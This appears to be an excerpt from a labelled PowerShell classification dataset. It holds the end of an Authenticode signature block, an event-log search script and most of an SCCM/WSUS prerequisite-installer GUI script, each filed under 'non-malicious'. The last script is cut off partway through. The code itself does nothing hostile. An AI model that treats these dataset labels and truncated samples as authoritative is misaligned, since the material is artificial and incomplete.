ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkE0MDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQD5r3DVRpAGQo9sTLUHeBC87NpK+qCBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6VzDHzAi # GA8yMDI0MDEyNTExMjMxMVoYDzIwMjQwMTI2MTEyMzExWjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDpXMMfAgEAMAcCAQACAiUiMAcCAQACAhNzMAoCBQDpXhSfAgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAEa3VXG2RGqGbIagjVGD132+r11E # bbsxbFRG4VEsq1xnljnV9cdUg9tdImAZoXHQPALYkNfDZwyNWTXZqVbN6zhszJwa # tD+8Ku/VX+Cxpw358F8UxRVqk9rDRa+QEsnwaOtgVo+/TLoOqWNtPs84VwT3RXO/ # CgyViZixFdP5rQmVHTUs4+Dmxlbdqx5gaARqQZz2MKy0cxP4+OAhv7exXTJh3rKo # QxKikaYNl7NmcAfX0mP1W8h1ugigW+Xv6bIsv5h3UpDl8VvqJrrYNiMY1Qolydms # igUJkkMM3zvPvs7iAgVG58OUBKOCYHm8tQUWxUDgLQieDjgujUmG55Tmap4xggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAdYn # af9yLVbIrgABAAAB1jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCBL6yYOV0RiPL7VaL3dfAzGxcJS # UR8GNQV8T5JMp/77kzCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EINbLTQ1X # eNM+EBinOEJMjZd0jMNDur+AK+O8P12j5ST8MIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHWJ2n/ci1WyK4AAQAAAdYwIgQg8KPOQ2TJ # WsdYErTQ0KZFYIte4nLMNc0SykVvyaARbHAwDQYJKoZIhvcNAQELBQAEggIAwm8b # UALP6AwTlhGJ4td0hxXBh7YDwaB4Wng6fg9MPyu+R25geJ+jDso2YkUAzCCbcC1e # GegVNMU0Zgw0qXwCzswgkV4KCmR9N+margz3QWWO6B++sfbeqJpq7fBVMeghOZry # e7nf5xl4YkAzMTjkGGPTEgmTNQmjJTx7zvNpXcZStac23eVVmWFkikg8JXlhKgpV # L+VL+0rDCCiVwvDSzwwV3Y/kZJU12IzmcmkRfonsraLUfpYSYuJVolPqDIMxmlvV # +1ycWPc0nVzh1R4KY+HzpMavUl+ynUroRv9D4VWv0lB5QEKZKBvDzLs1KlIL4nbe # D1bnrhZZ0TlXxzkxlHklqzJM/n3jgLYqhsBAb0rGBtFzjzX7Ayf2j6lUobq0tJnZ # HRNgd+4GcesC1c8RNI3cUeSe4OGBlaNtF3gjHT6AxQEUhduUMoihHyN6iwizaJrG # /RBTLknaHOI19Yg1/e1bI8L29gPJs8PGj6rF4kyP3oKIjkYoOK6iAgt7u9Ukum98 # 2WmhEzZdm9I1h0FsXfnzNUfHuRHc540XE0HCpCH3XwuV7YeGFnXW/eCFTKCCeIob # hiOaVI7tE4KOmiXa+3ubA1eRVL/lu9bWoMIrQP2u61PhcGf629CjNtxInEIwjMmb # 9BzzS2woK8yfceIyfFd6H/Srm+WrUAoClUedpsk= # SIG # End signature block
combined_dataset/train/non-malicious/4202.ps1
4202.ps1
[CmdletBinding()] param ( [string]$LogFileLocation, [string]$LogFileName, [string]$EventLogName, [string]$LogMessage ) Set-Variable -Name Logs -Value $null -Scope Local -Force cls $ReportFile = $LogFileLocation + $LogFileName $LogMessage = [char]42 + $LogMessage + [char]42 $Logs = Get-EventLog -LogName $EventLogName | where { $_.Message -like $LogMessage } If ($Logs -ne $null) { $Logs Do { Try { $Written = $true Out-File -FilePath $ReportFile -InputObject $env:COMPUTERNAME -Append -Encoding UTF8 -ErrorAction SilentlyContinue } Catch { Start-Sleep -Seconds 1 $Written = $false } } while ($Written -eq $false) }
combined_dataset/train/non-malicious/2272.ps1
2272.ps1
function Validate-OS { $ProductType = Get-WmiObject -Namespace "Root\CIMV2" -Class Win32_OperatingSystem | Select-Object -ExpandProperty ProductType if ($ProductType -eq 3) { Load-Form } else { if ($ProductType -eq 2) { $ShellObject = New-Object -ComObject Wscript.Shell $PopupValidate = $ShellObject.Popup("The detected server is a Domain Controller.`nThis program is not supported on this platform.",0,"Non-supported System",0) } if ($ProductType -eq 1) { $ShellObject = New-Object -ComObject Wscript.Shell $PopupValidate = $ShellObject.Popup("The detected operating system is a Workstation OS.`nThis program is not supported on this platform.",0,"Non-supported System",0) } } } function Load-Form { if ($host.Version -like "2.0") { Import-Module ServerManager } $Form.Controls.Add($LabelHeader) $Form.Controls.Add($BlogLink) $Form.Controls.Add($ButtonSecondarySite) $Form.Controls.Add($ButtonPrimarySite) $Form.Controls.Add($ButtonCAS) $Form.Controls.Add($ButtonMP) $Form.Controls.Add($ButtonAppCat) $Form.Controls.Add($ButtonDP) $Form.Controls.Add($ButtonEP) $Form.Controls.Add($ButtonExtendActiveDirectory) $Form.Controls.Add($ButtonWSUS) $Form.Controls.Add($ButtonADK) $Form.Controls.Add($ButtonSystemManagementContainer) $Form.Controls.Add($GBSites) $Form.Controls.Add($GBSiteSystemRoles) $Form.Controls.Add($GBOther) $Form.Add_Shown({$Form.Activate()}) [void] $Form.ShowDialog() } function Load-Start { $Form.Controls.Clear() $ProgressBar.Value = 0 $TextBoxDC.Enabled = $true $TextBoxSMCRemote.Enabled = $false $CBSMCCreate.Checked = $false $TextBoxSMCRemote.ResetText() $TabControlSMC.Controls.Remove($TabPageSMCComputer) $TabControlSMC.Controls.Remove($TabPageSMCGroup) if ($ButtonBack.Location.Y -eq 385) { $ButtonBack.Location = New-Object System.Drawing.Size(563,420) } if ($OutputBox.Location.X -eq 380) { $OutputBox.Location = New-Object System.Drawing.Size(10,10) $OutputBox.Size = New-Object System.Drawing.Size(763,350) } $Form.Controls.Add($LabelHeader) $Form.Controls.Add($BlogLink) $Form.Controls.Add($ButtonSecondarySite) $Form.Controls.Add($ButtonPrimarySite) $Form.Controls.Add($ButtonCAS) $Form.Controls.Add($ButtonMP) $Form.Controls.Add($ButtonAppCat) $Form.Controls.Add($ButtonDP) $Form.Controls.Add($ButtonEP) $Form.Controls.Add($ButtonExtendActiveDirectory) $Form.Controls.Add($ButtonWSUS) $Form.Controls.Add($ButtonADK) $Form.Controls.Add($ButtonSystemManagementContainer) $Form.Controls.Add($GBSites) $Form.Controls.Add($GBSiteSystemRoles) $Form.Controls.Add($GBOther) Leave-WaterMarkStart -InputObject $TextBoxDC -Text $WaterMarkDC Leave-WaterMarkStart -InputObject $TextBoxWSUSSQLServer -Text $WaterMarkWSUSSQLServer Leave-WaterMarkStart -InputObject $TextBoxWSUSSQLInstance -Text $WaterMarkWSUSSQLInstance } function Load-CAS { $Form.Controls.Clear() $Form.Controls.Add($ButtonBack) $Form.Controls.Add($ProgressBar) $Form.Controls.Add($OutputBox) $Form.Controls.Add($ButtonInstallCAS) $OutputBox.ResetText() if ($ButtonInstallCAS.Enabled -eq $false) { $ButtonInstallCAS.Enabled = $true } } function Load-Primary { $Form.Controls.Clear() $Form.Controls.Add($ButtonBack) $Form.Controls.Add($ProgressBar) $Form.Controls.Add($OutputBox) $Form.Controls.Add($ButtonInstallPrimarySite) $OutputBox.ResetText() if ($ButtonInstallPrimarySite.Enabled -eq $false) { $ButtonInstallPrimarySite.Enabled = $true } } function Load-Secondary { $Form.Controls.Clear() $Form.Controls.Add($ButtonBack) $Form.Controls.Add($ProgressBar) $Form.Controls.Add($OutputBox) $Form.Controls.Add($ButtonInstallSecondarySite) $OutputBox.ResetText() if ($ButtonInstallSecondarySite.Enabled -eq $false) { $ButtonInstallSecondarySite.Enabled = $true } } function Load-MP { $Form.Controls.Clear() $Form.Controls.Add($ButtonBack) $Form.Controls.Add($ProgressBar) $Form.Controls.Add($OutputBox) $Form.Controls.Add($ButtonInstallMP) $OutputBox.ResetText() if ($ButtonInstallMP.Enabled -eq $false) { $ButtonInstallMP.Enabled = $true } } function Load-AppCat { $Form.Controls.Clear() $Form.Controls.Add($ButtonBack) $Form.Controls.Add($ProgressBar) $Form.Controls.Add($OutputBox) $Form.Controls.Add($ButtonInstallAppCat) $OutputBox.ResetText() if ($ButtonInstallAppCat.Enabled -eq $false) { $ButtonInstallAppCat.Enabled = $true } } function Load-DP { $Form.Controls.Clear() $Form.Controls.Add($ButtonBack) $Form.Controls.Add($ProgressBar) $Form.Controls.Add($OutputBox) $Form.Controls.Add($ButtonInstallDP) $OutputBox.ResetText() if ($ButtonInstallDP.Enabled -eq $false) { $ButtonInstallDP.Enabled = $true } } function Load-EP { $Form.Controls.Clear() $Form.Controls.Add($ButtonBack) $Form.Controls.Add($ProgressBar) $Form.Controls.Add($OutputBox) $Form.Controls.Add($ButtonInstallEP) $Form.Controls.Add($RadioButtonEP) $Form.Controls.Add($RadioButtonEPP) $Form.Controls.Add($GBEP) $OutputBox.ResetText() $RadioButtonEP.Checked = $true if ($ButtonInstallEP.Enabled -eq $false) { $ButtonInstallEP.Enabled = $true } if ($RadioButtonEP.Enabled -eq $false) { $RadioButtonEP.Enabled = $true } if ($RadioButtonEPP.Enabled -eq $false) { $RadioButtonEPP.Enabled = $true } } function Load-ExtendActiveDirectory { $Form.Controls.Clear() $Form.Controls.Add($ButtonBack) $Form.Controls.Add($ProgressBar) $Form.Controls.Add($OutputBox) $Form.Controls.Add($ButtonConnectDC) $Form.Controls.Add($TextBoxDC) $Form.Controls.Add($GBExtendAD) $OutputBox.ResetText() if ($ButtonExtendAD.Enabled -eq $false) { $ButtonExtendAD.Enabled = $true } } function Load-WSUS { $Form.Controls.Clear() $Form.Controls.Add($ButtonBack) $Form.Controls.Add($ProgressBar) $Form.Controls.Add($OutputBox) $Form.Controls.Add($RadioButtonWID) $Form.Controls.Add($RadioButtonSQL) $Form.Controls.Add($TextBoxWSUSSQLServer) $Form.Controls.Add($TextBoxWSUSSQLInstance) $Form.Controls.Add($GBWSUS) $Form.Controls.Add($GBWSUSSQL) $Form.Controls.Add($ButtonInstallWSUS) $RadioButtonWID.Checked = $true $OutputBox.ResetText() if ($ButtonInstallWSUS.Enabled -eq $false) { $ButtonInstallWSUS.Enabled = $true } if ($RadioButtonWID.Enabled -eq $false) { $RadioButtonWID.Enabled = $true } if ($RadioButtonSQL.Enabled -eq $false) { $RadioButtonSQL.Enabled = $true } if ($TextBoxWSUSSQLServer.Enabled -eq $true) { $TextBoxWSUSSQLServer.Enabled = $false } if ($TextBoxWSUSSQLInstance.Enabled -eq $true) { $TextBoxWSUSSQLInstance.Enabled = $false } } function Load-ADK { $Form.Controls.Clear() $Form.Controls.Add($ButtonBack) $Form.Controls.Add($ProgressBar) $Form.Controls.Add($OutputBox) $Form.Controls.Add($ButtonInstallADK) $Form.Controls.Add($RadioButtonOnline) $Form.Controls.Add($RadioButtonOffline) $Form.Controls.Add($GBADK) $RadioButtonOnline.Checked = $true $OutputBox.ResetText() if ($ButtonInstallADK.Enabled -eq $false) { $ButtonInstallADK.Enabled = $true } if ($RadioButtonOnline.Enabled -eq $false) { $RadioButtonOnline.Enabled = $true } if ($RadioButtonOffline.Enabled -eq $false) { $RadioButtonOffline.Enabled = $true } } function Load-SystemManagementContainer { $Form.Controls.Clear() $Form.Controls.Add($TabControlSMC) $TabControlSMC.Controls.Add($TabPageSMCComputer) $TabControlSMC.Controls.Add($TabPageSMCGroup) if ($ButtonBack.Location.Y -eq 420) { $ButtonBack.Location = New-Object System.Drawing.Size(563,385) } $TabPageSMCComputer.Controls.Add($ButtonBack) $TabPageSMCComputer.Controls.Add($OutputBox) $TabPageSMCComputer.Controls.Add($ButtonConfigureSystemManagementContainerComputer) $TabPageSMCComputer.Controls.Add($TextBoxSMCLocal) $TabPageSMCComputer.Controls.Add($TextBoxSMCRemote) $TabPageSMCComputer.Controls.Add($RadioButtonSMCLocal) $TabPageSMCComputer.Controls.Add($RadioButtonSMCRemote) $TabPageSMCComputer.Controls.Add($CBSMCCreate) $TabPageSMCComputer.Controls.Add($LabelSMCCreate) $TabPageSMCComputer.Controls.Add($GBSystemManagementContainer) Validate-ADGroupSearch $TextBoxSMCGroupSearch.ResetText() $TextBoxSMCGroupResult.ResetText() $TabPageSMCGroup.Controls.Add($TextBoxSMCGroupSearch) $TabPageSMCGroup.Controls.Add($TextBoxSMCGroupResult) $TabPageSMCGroup.Controls.Add($DGVSMCGroup) $TabPageSMCGroup.Controls.Add($ButtonBackGroup) $TabPageSMCGroup.Controls.Add($ButtonSystemManagementContainerGroupSearch) $TabPageSMCGroup.Controls.Add($ButtonConfigureSystemManagementContainerGroup) $TabPageSMCGroup.Controls.Add($GBSystemManagementContainerGroup) $TabPageSMCGroup.Controls.Add($GBSystemManagementContainerGroupSearch) $OutputBox.ResetText() $RadioButtonSMCLocal.Checked = $true if ($ButtonConfigureSystemManagementContainerComputer.Enabled -eq $false) { $ButtonConfigureSystemManagementContainerComputer.Enabled = $true } if ($ButtonConfigureSystemManagementContainerGroup.Enabled -eq $true) { $ButtonConfigureSystemManagementContainerGroup.Enabled = $false } if ($ButtonSystemManagementContainerGroupSearch.Enabled -eq $false) { $ButtonSystemManagementContainerGroupSearch.Enabled = $true } if ($TextBoxSMCGroupSearch.Enabled -eq $false) { $TextBoxSMCGroupSearch.Enabled -eq $true } if ($RadioButtonSMCLocal.Enabled -eq $false) { $RadioButtonSMCLocal.Enabled = $true } if ($RadioButtonSMCRemote.Enabled -eq $false) { $RadioButtonSMCRemote.Enabled = $true } } function Validate-RebootPending { param( [parameter(Mandatory=$true)] $ComputerName ) $RebootPendingCBS = $null $RebootPendingWUAU = $null $GetOS = Get-WmiObject -Class Win32_OperatingSystem -Property BuildNumber,CSName -ComputerName $ComputerName $ConnectRegistry = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]"LocalMachine",$ComputerName) if ($GetOS.BuildNumber -ge 6001) { $RegistryCBS = $ConnectRegistry.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\").GetSubKeyNames() $RebootPendingCBS = $RegistryCBS -contains "RebootPending" } $RegistryWUAU = $ConnectRegistry.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\").GetSubKeyNames() $RebootPendingWUAU = $RegistryWUAU -contains "RebootRequired" $RegistryPFRO = $ConnectRegistry.OpenSubKey("SYSTEM\CurrentControlSet\Control\Session Manager\") $RegistryValuePFRO = $RegistryPFRO.GetValue("PendingFileRenameOperations",$null) if ($RegistryValuePFRO) { $RebootPendingPFRO = $true } if (($RebootPendingCBS) -or ($RebootPendingWUAU) -or ($RebootPendingPFRO)) { return $true } else { return $false } } function Validate-CASInstall { $CASErrorHandler = 0 if ((([System.Environment]::OSVersion.Version).Build -lt 6001) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $CASErrorHandler++ } if ($CASErrorHandler -gt 0) { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2008 64-bit and later is supported" -Type "ERROR: " $ButtonInstallCAS.Enabled = $false } else { $GetComputerName = $env:COMPUTERNAME $ValidateCASRebootPending = Validate-RebootPending -ComputerName $GetComputerName if ($ValidateCASRebootPending) { $ButtonInstallCAS.Enabled = $false Write-OutputBox -OutputBoxMessage "A reboot is pending, please restart the system." -Type "WARNING: " } else { Install-CAS } } } function Validate-PrimaryInstall { $PrimaryErrorHandler = 0 if ((([System.Environment]::OSVersion.Version).Build -lt 6001) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $PrimaryErrorHandler++ } if ($PrimaryErrorHandler -gt 0) { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2008 64-bit and later is supported" -Type "ERROR: " $ButtonInstallPrimarySite.Enabled = $false } else { $GetComputerName = $env:COMPUTERNAME $ValidatePrimaryRebootPending = Validate-RebootPending -ComputerName $GetComputerName if ($ValidatePrimaryRebootPending) { $ButtonInstallPrimarySite.Enabled = $false Write-OutputBox -OutputBoxMessage "A reboot is pending, please restart the system." -Type "WARNING: " } else { Install-Primary } } } function Validate-SecondaryInstall { $SecondaryErrorHandler = 0 if ((([System.Environment]::OSVersion.Version).Build -lt 6001) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $SecondaryErrorHandler++ } if ($SecondaryErrorHandler -gt 0) { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2008 64-bit and later is supported" -Type "ERROR: " $ButtonInstallSecondarySite.Enabled = $false } else { $GetComputerName = $env:COMPUTERNAME $ValidateSecondaryRebootPending = Validate-RebootPending -ComputerName $GetComputerName if ($ValidateSecondaryRebootPending) { $ButtonInstallSecondarySite.Enabled = $false Write-OutputBox -OutputBoxMessage "A reboot is pending, please restart the system." -Type "WARNING: " } else { Install-Secondary } } } function Validate-MPInstall { $MPErrorHandler = 0 if ((([System.Environment]::OSVersion.Version).Build -lt 6001) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $MPErrorHandler++ } if ($MPErrorHandler -gt 0) { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2008 64-bit and later is supported" -Type "ERROR: " $ButtonInstallMP.Enabled = $false } else { $GetComputerName = $env:COMPUTERNAME $ValidateMPRebootPending = Validate-RebootPending -ComputerName $GetComputerName if ($ValidateMPRebootPending) { $ButtonInstallMP.Enabled = $false Write-OutputBox -OutputBoxMessage "A reboot is pending, please restart the system." -Type "WARNING: " } else { Install-MP } } } function Validate-AppCatInstall { $AppCatErrorHandler = 0 if ((([System.Environment]::OSVersion.Version).Build -lt 6001) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $AppCatErrorHandler++ } if ($AppCatErrorHandler -gt 0) { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2008 64-bit and later is supported" -Type "ERROR: " $ButtonInstallAppCat.Enabled = $false } else { $GetComputerName = $env:COMPUTERNAME $ValidateAppCatRebootPending = Validate-RebootPending -ComputerName $GetComputerName if ($ValidateAppCatRebootPending) { $ButtonInstallAppCat.Enabled = $false Write-OutputBox -OutputBoxMessage "A reboot is pending, please restart the system." -Type "WARNING: " } else { Install-AppCat } } } function Validate-DPInstall { $DPErrorHandler = 0 if ((([System.Environment]::OSVersion.Version).Build -lt 6001) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $DPErrorHandler++ } if ($DPErrorHandler -gt 0) { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2008 64-bit and later is supported" -Type "ERROR: " $ButtonInstallDP.Enabled = $false } else { $GetComputerName = $env:COMPUTERNAME $ValidateDPRebootPending = Validate-RebootPending -ComputerName $GetComputerName if ($ValidateDPRebootPending) { $ButtonInstallDP.Enabled = $false Write-OutputBox -OutputBoxMessage "A reboot is pending, please restart the system." -Type "WARNING: " } else { Install-DP } } } function Validate-EPInstall { $EPErrorHandler = 0 if ((([System.Environment]::OSVersion.Version).Build -lt 9200) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $EPErrorHandler++ } if ($EPErrorHandler -gt 0) { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2012 and later is supported" -Type "ERROR: " $ButtonInstallEP.Enabled = $false } else { $GetComputerName = $env:COMPUTERNAME $ValidateEPRebootPending = Validate-RebootPending -ComputerName $GetComputerName if ($ValidateEPRebootPending) { $ButtonInstallEP.Enabled = $false Write-OutputBox -OutputBoxMessage "A reboot is pending, please restart the system." -Type "WARNING: " } else { Install-EP } } } function Validate-DomainController { param( [parameter(Mandatory=$true)] $DCName ) Process { $SchemaMaster = ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).SchemaRoleOwner.Name if (($DCName -like $SchemaMaster) -or ($DCName -like $SchemaMaster.Split(".")[0])) { Write-OutputBox -OutputBoxMessage "Specified server name is the Schema Master role owner" -Type "INFO: " return $true } elseif (($DCName -ne $SchemaMaster) -or ($DCName -ne $SchemaMaster.Split(".")[0])) { Write-OutputBox -OutputBoxMessage "The specified server name is not the Schema Master role owner in the forest" -Type "ERROR: " return $false } else { return $false } } } function Validate-ExtendActiveDirectory { $OutputBox.ResetText() $EADErrorHandler = 0 $CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent() $WindowsPrincipal = New-Object System.Security.Principal.WindowsPrincipal($CurrentUser) if (-not($WindowsPrincipal.IsInRole("Schema Admins"))) { Write-OutputBox -OutputBoxMessage "Current user is not a member of the Schema Admins group" -Type "ERROR: " } if ($TextBoxDC.Text -eq $WaterMarkDC) { Write-OutputBox -OutputBoxMessage "Please enter a hostname of a domain controller" -Type "ERROR: " } if (-not(Test-Connection -ComputerName $TextBoxDC.Text -Count 1 -ErrorAction SilentlyContinue)) { Write-OutputBox -OutputBoxMessage "Unable to establish a connection to the server" -Type "ERROR: " } else { if (Validate-DomainController -DCName $TextBoxDC.Text) { Write-OutputBox -OutputBoxMessage "Successfully established a connection to the server" -Type "INFO: " $DCConnected = $true } } if ($DCConnected) { $TextBoxDC.Enabled = $false $Form.Controls.Remove($ButtonConnectDC) $Form.Controls.Add($ButtonInstallExtendAD) } } function Validate-WSUS { $WSUSErrorHandler = 0 if ((([System.Environment]::OSVersion.Version).Build -lt 9200) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $WSUSErrorHandler++ } if ($WSUSErrorHandler -gt 0) { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2012 64-bit and later is supported" -Type "ERROR: " $ButtonInstallWSUS.Enabled = $false } else { $GetComputerName = $env:COMPUTERNAME $ValidateWSUSRebootPending = Validate-RebootPending -ComputerName $GetComputerName if ($ValidateWSUSRebootPending) { $ButtonInstallWSUS.Enabled = $false Write-OutputBox -OutputBoxMessage "A reboot is pending, please restart the system." -Type "WARNING: " } else { if (($TextBoxWSUSSQLServer.Text.Length -eq 0) -and ($RadioButtonSQL.Checked -eq $true)) { Write-OutputBox -OutputBoxMessage "Please enter a SQL Server computer name" -Type "ERROR: " } else { Install-WSUS } } } } function Validate-ADK { $ADKErrorHandler = 0 if ((([System.Environment]::OSVersion.Version).Build -lt 7600) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $ADKErrorHandler++ } if ($ADKErrorHandler -gt 0) { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2008 R2 64-bit and later is supported" -Type "ERROR: " $ButtonInstallADK.Enabled = $false } else { $GetComputerName = $env:COMPUTERNAME $ValidateADKRebootPending = Validate-RebootPending -ComputerName $GetComputerName if ($ValidateADKRebootPending) { $ButtonInstallADK.Enabled = $false Write-OutputBox -OutputBoxMessage "A reboot is pending, please restart the system." -Type "WARNING: " } else { Install-ADK } } } function Validate-SystemManagementContainerComputer { $OutputBox.ResetText() $SMCErrorHandler = 0 $ShellObject = New-Object -ComObject Wscript.Shell $CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent() $WindowsPrincipal = New-Object System.Security.Principal.WindowsPrincipal($CurrentUser) if ((([System.Environment]::OSVersion.Version).Build -lt 7600) -or ([System.Environment]::Is64BitOperatingSystem -eq $false)) { $SMCErrorHandler = 1 } if(-not($WindowsPrincipal.IsInRole("Domain Admins"))) { $SMCErrorHandler = 2 } switch ($SMCErrorHandler) { 1 { Write-OutputBox -OutputBoxMessage "Unsupported Operating System detected. Windows Server 2008 R2 64-bit and later is supported" -Type "ERROR: " ; 